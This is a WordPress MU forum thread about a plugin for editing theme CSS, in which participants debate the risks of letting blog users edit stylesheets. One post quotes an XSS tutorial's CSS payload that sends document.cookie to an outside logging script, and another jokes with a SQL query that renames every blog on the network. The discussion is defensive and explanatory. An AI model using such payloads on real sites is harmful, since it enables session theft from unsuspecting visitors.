WordPress MU

re: HTML_CSS
The HTML_CSS class should already be included. If you do manage to install HTML_CSS yourself, you can edit the plugin and delete everything below the line that says "everything below this line can be deleted if you have HTML_CSS"

donncha: i am not too concerned about whether they load style information in the header, but more about calling get_header() out of context as the theme devs etc would not be expecting it. for example if they put some code in header.php which relied on footer.php to "end cleanly". twas just a bit of 'defensive' coding on my part :)
anyway pulling the whole page should not be too resource intensive (it caches it until user clicks 'reset')

GUI is a great idea! I wanted to implement grouping all the same colours together and allowing the user to change the same colour throughout the CSS.

another slightly more ambitious idea is to convert all the colours to HSB and allow the user to shift the HSB for all the colours... and also those of the images through an external img manipulation program like imagemagick!

anybody wanna code it? :)

mrball - I call get_header() but capture the output of it in an output buffer :)

is it possible to edit the whole code of the theme for each member

mazz: there's a plugin for that but your members can write stuff like $mysqbdb->query('update wp_blogs set title="u b33n p4Wn3D" where 1');

lol @ mrball

thx i just wanna to add items to sidebar and i found solution

how about an addition to this plugin that allows more advanced users to freely edit the stylesheet?

While we're at it... let's standardise the tags and references in the templates... create more sections... break down the main template file into a few more pieces (apart from sidebar.php, footer.php etc! Muchos flexibilitos... but slow loading!!

A CSS editor plugin would be way cool... with a live preview of the site so one can see the changes in it's actual environment!!

Whoa - mickemus, you;'re on the same page as us - me and the mr were just talking about this last night. Sure, it might seem like a regression in terms of WP - but for MU it would be stellar.

I'd love to see a different default MU theme - one that really showcases the functionality of the templating systems. (and different ones in the bundle too)

If the user can update the css and upload images, You can put up a flexible design, something like the css zen garden html, and the users can modify it to look however they want. this can really be cool...

Of course that allows folks to put in cookie grabbing javascripts and other "fun goodies"

Leave my cookies alone... especially the chocolate chip ones!!!

I wouldn't put it on a wide-open, general MU site. But on a network, possibly for only some users who have requested it... (and shown they are not l33t hax0rs - or think they are..)

What about having one MU theme that was highly-customizable?

Great plugin.. no need to tweak the css directly or with third a party tool. Maybe you want to port it for mu-plugins usage and place it under Site Admin with a theme selector dropdown? This way only the blog guru can do edits (hopefully)! Maybe even a "save as new" and "enable for blog_id X). Potential value added service - users get some free credits for changes then buy additional credits for more changes ;)

Jason!! KUDOS!

Of course that allows folks to put in cookie grabbing javascripts and other "fun goodies"

How exactly? I'm talking about letting them edit only the CSS file.
and anyways, I don't see how any damage can be done with JS to the host (yes, he can collect info about his visitors, but anyone can do the same from any site they set up, so it's none of my business.

The problem is that your visitors have the login information for their blogs on your site in their browser cookies which are perfectly visible to any nasty Javascript.

So let me get this straight, the problem with css is that users will use a js to get information from cookies stored in their own browser? they can just look at them through the browser. or is it the other users? again, that's non of my business as long as my site stays secure

lobsterman - I'd hate to have a blog on your site then.

If I was logged in to my own blog on your site, and visited someone else's blog on your site, if they were malicious and could load Javascript they could steal my cookies with a small bit of code that calls a URL on their own server with my username and password when I visit. Here's how: http://jehiah.com/archive/xss-stealing-cookies-101

Why doesn't this affect Blogger? They use a different server address for submitting comments. It's unwieldy, but works. You're never logged in on a blogspot.com URL.

I see. so the problem is javascript only? what if any combination of the letters j and s together get filtered out? would that solve the problem or can users run javascripts with other extensions?

And is there a way to address this issue and allow users to use javascript, like set the login cookie to each blogs subdomain?

also another idea to give users customization of the whole theme without risk might be a smarty based theme (with the php files not editable) what do you think?

It doesn't matter what extension you give a .js source file. It's all code in the end.
You can filter the Javascript which is what Myspace does I think, but then you leave yourself open to someone figuring out how to get past the filter. There was a myspace worm a few months ago that took advantage of a bug in IE to propogate. You could certainly limit the cookies to each subdomain, or path, but then you loose out because people have to enter their details when leaving a comment, and you can't do nice things like having an admin bar for logged in users.

Smarty was used in an older version, it works well, but it was abandoned because you still have problems with filtering Javascript, and CSS. Finally, there are a hell of a lot of WordPress themes out there that aren't written in Smarty template tags.

Finally, there are a hell of a lot of WordPress themes out there that aren't written in Smarty template tags.

Yes, but I want allow users to be able to customize as much as I can.

What about strictly limiting file extensions in the css to gif, jpg and png? I'm pretty sure no browser will execute a script hidden as an image.

IE users are still exposed. A .jpg url can really be a .php file. That's what happens in WPMU. Besides. the username/password appears in the remote user's logfile..
See the example here:
http://jehiah.com/archive/xss-stealing-cookies-101

Lobsterman, please see the Striped Plus theme. It has a really extensive options page for chanign things on the theme. I'm not sure *how* secure it is, but it at least lets users tweak, which is what most of them want to do anyway.

donncha: I don't see how a remotely loading php file can be of any danger, it's not on the wpmu server and it's server side, so no harm user side. JS is what can be risky, and no browsers will run a js with a jpg extenssion

One more time then :)

From the above mention XSS page: (this will probably get mangled, you should read the above page carefully!)

"We can also use another method in IE. Execute the javascript in CSS.

<style>
.getcookies{background-image:url('javascript:new Image().src="http://jehiah.com/_sandbox/log.cgi?c="+encodeURI(document.cookie);');}
</style>
<p class="getcookies">

Any time you let users post text and you don't religiously restrict the content, they can steal sessions. Scarry? If you are a developer it better scare the hell out of you."

See the filename of the jpeg file? It's log.cgi .. nasty, nasty, nasty.

OK, here's the combo: the words js and javascript and http:// so all url's are local only. and the image directory is set not to execute any script. any security flaws now?

There probably are security risks. Javascript code could possibly send a comment to a post on the malicious blog on your site with the username and password.

It's safer not to allow untrusted users to edit Javascript and even css.

hey, the world can't move forward without taking risks, this one doesn't sound serious (no javascript) so I'll probably do it.

WPMU is open source... why not take the source and use it as a basis for a new project? I've even got a name for the fork: WPMV: WordPress Multiple Vulnerabilities...